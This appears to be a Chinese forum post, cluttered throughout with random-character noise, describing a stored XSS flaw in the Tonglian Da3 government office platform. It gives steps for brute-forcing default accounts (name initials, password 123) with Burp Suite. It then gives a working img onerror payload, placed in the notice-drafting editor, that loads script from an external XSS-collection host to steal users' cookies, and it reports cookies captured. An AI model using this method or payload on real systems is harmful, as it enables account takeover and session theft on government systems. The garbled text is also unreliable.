+ A: z4 G9 F2 C- @$ E! o3 ~6 ^
0 m5 F1 k% Q4 F9 l; E 同联Da3协同办公平台后台通用储存型xss漏洞9 S- J" R. E) M8 `
! R+ i1 g& y o( K' ?0 n9 e/ g & q$ `) f, I2 w* m
平台简介:
) B8 g, p% j, X- L/ L3 @
, Y- r/ _3 @3 z! C" b
3 p3 x$ `& A) J; W " h9 [! S9 m4 ^2 o! x
) u$ P4 H) H6 ^. T6 D* J. R# c, t
+ l! q( N: t0 {2 k! Z8 o
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
( z8 p5 J" X5 Q, \& j. V$ U6 _同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
/ v ~4 ~' k9 d( V/ V7 Y' F6 V
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!) ~ y$ J+ {! l" T3 P2 |8 r
8 k* g" \$ t' m9 e9 G
4 ]) _! f. G) f X; }4 m, @
* N4 {. R# j! i& s" f% P8 s
! ^2 U. o y/ o, F/ F
* H" S! J: G4 y* p
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:& W6 X. x# Q7 T9 k. ^, C; l# u
9 p# |7 B/ E- `4 j
- U$ f, T& T9 L- o# G + H0 o, b9 W$ N) p$ t/ P& c+ d4 o. q
6 `* ?; O8 f: c9 f
% h7 ^+ J8 i) O7 g http://1.1.1.1:7197/cap-aco/#(案例2-)
' y. g' d& N0 D0 e' J# [' c
+ y# ?# q+ C( ^' J# O( Q
: v# l7 C! |' w) E% s: k
http://www.XXOO.com (案例1-官网网站)% f4 Z! d7 X$ a7 }% ^
' Z) ?+ ? ]4 O: v+ r ' K6 h( q: l$ f
漏洞详情:
" B- M. m7 C# K% C
+ e0 g& I& p& L9 ^, k6 u6 A
7 { }* ?2 O5 ?' l 案例一、
+ r: F& r" d& E# S* q! Z( P- E
5 @9 }4 Q% B; B6 v* ~/ x5 u' S & i! k% d$ }6 @1 ~
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
1 b$ e2 z6 b. m/ G( B
7 q" L$ Z m( N9 ~& c+ Q
: R c( e2 D9 P# t- O# f7 u+ t) Z- W
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:) y) e3 O6 ]% l
; U; d! z; N6 }. ^; S. z* X3 Z/ }: A
) e$ ~5 H3 h0 ^4 G, J3 p9 r
0 k+ E7 O' k9 B( X0 Y
1 X! _$ R+ C" O! I+ [: Q
# Z) ~4 ^! p+ z3 {" K
- G- D4 S# b0 X' d) ]! v* Q
& G8 G- C9 ?# @. \ 0 j" k2 E2 [* K: u8 Z3 @
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
/ C! ]5 {; Z, u, v5 O4 n
0 j/ {. z; x: G9 U! K. `* a
& q" L* W6 O" ?* L: p# J% J % {# J) b, m, B! x1 O1 @4 ^ _# I
# {, F o+ x% R0 y5 A) N$ z
+ Y" E1 h7 R( g* Y/ m
/ L' e- d* u9 R M# \, V
; _( c% O* y4 v: D
3 U/ Y9 U$ e w+ n% M
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 ; L7 Y5 {3 P6 \. T! o+ K
6 M7 \1 h2 S. t* b
2 u" ^; [8 \. g L$ {$ H I: Y 0 o3 g# ^1 V% } N
: C# t( ]; k) l1 |/ d- ~6 c
1 A" T5 k* n8 ]6 t3 J% x: e3 v
<img src=x
* e1 u0 }7 M, s" K6 U+ A, oonerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: / x) ^1 j7 j, k
. s; m: P( G- F5 k- ]# J/ I0 I
/ m( T% ^+ W+ Z2 Q' |: b3 A
* ~" x; j& \& ?6 c* I3 [9 m
5 J& Z3 M0 G' U* g' C) M! j1 n
/ _7 e* H5 w' o1 o1 }# x
然后发送,接收cookie如图:
9 r9 v/ X g- a1 p4 X" ^( U- F& K4 g
# q) r0 O4 D8 V* d
, k5 E. A1 B! a+ o % Q ]8 |/ p! k6 u, p" Y
0 `- n- E K( S1 g. K
: W: F* o# ~% ]9 a9 G + a9 u* K* U) J8 [) E; K
( Y5 q1 J4 c' s+ v : J1 d: [) ~1 a( M! g# u
- ?0 Y, b% n) G/ x4 s. @' w( f
/ }+ g4 \5 b7 c' L" X8 ^
% |( {1 x9 T$ P. r3 g : p9 _; M0 z- |( `1 |% j
5 L$ C9 h1 S! e
/ S( X6 G+ Y# @ / k [7 r3 p' `6 j4 y6 c( ^7 I
( C/ [) M# }" m0 Q
0 W% ~" H6 L+ B& ]4 @
4 s: z) L8 H9 H' Y; e4 S0 F% w
# m5 f( G# K/ g0 C% O' u8 n 4 k: e1 @, W m
7 _( z# p" T' p5 |
' S- p/ n. S8 K; G; e" n- U
/ N4 ], J1 B" i9 T S* | 案例2、 : M: Q4 s, {5 ~( f: K8 H. k
6 T/ g5 N+ l0 I; z2 i
* b6 B3 Q/ r- J% @# S+ v O 前面步骤都一样,下面看效果图: ! e. u+ l5 |) ]- h# Z/ l6 j
; D# ^$ @& I: ^6 D; {5 }3 l ; a/ ~$ R: y2 {* K5 ^. S( g3 X
3 b4 P: G6 N, i# H- G9 ^6 z# U- m
. A& t8 Q8 K, g. u
( }9 q3 c+ G: j/ b- {( y- \
/ U& M K, l+ v% [) M
% h" G$ j% L( b6 y/ c; o, g
2 Z- B! J( n' ]8 m& o0 a) E
, G2 f8 l0 ]3 u6 g' t5 N& j5 y4 K9 v
* V3 F- Y- i6 c. X: R" \
% L H7 P+ C0 ?& E% R1 l
: [) I4 }8 m- c( ~# E4 P1 T
. H& s# h; K- s7 p7 G- m0 D
: b; h# x1 e9 d' V
+ R: S! M2 P5 v: x
1 Q5 Q: X, [" s3 }( R+ i$ R; {
) l4 i8 F! y1 i1 {' s3 _
; U& z; n$ H0 k) w
% x: {( E6 N, ]* a+ W
. A' G7 G- j* }3 f; i, a% D 1 O. X) v/ X2 X
R' _& r) f/ J, F - ~# @% z9 f6 L5 r
/ Q2 B t0 L* I$ j
7 x+ V" i2 B9 I* C" I& l
/ r; o6 x3 J; ^% C; w: q* B 3 P' s! x2 K( n: E
' h* u1 O( v$ H" y% R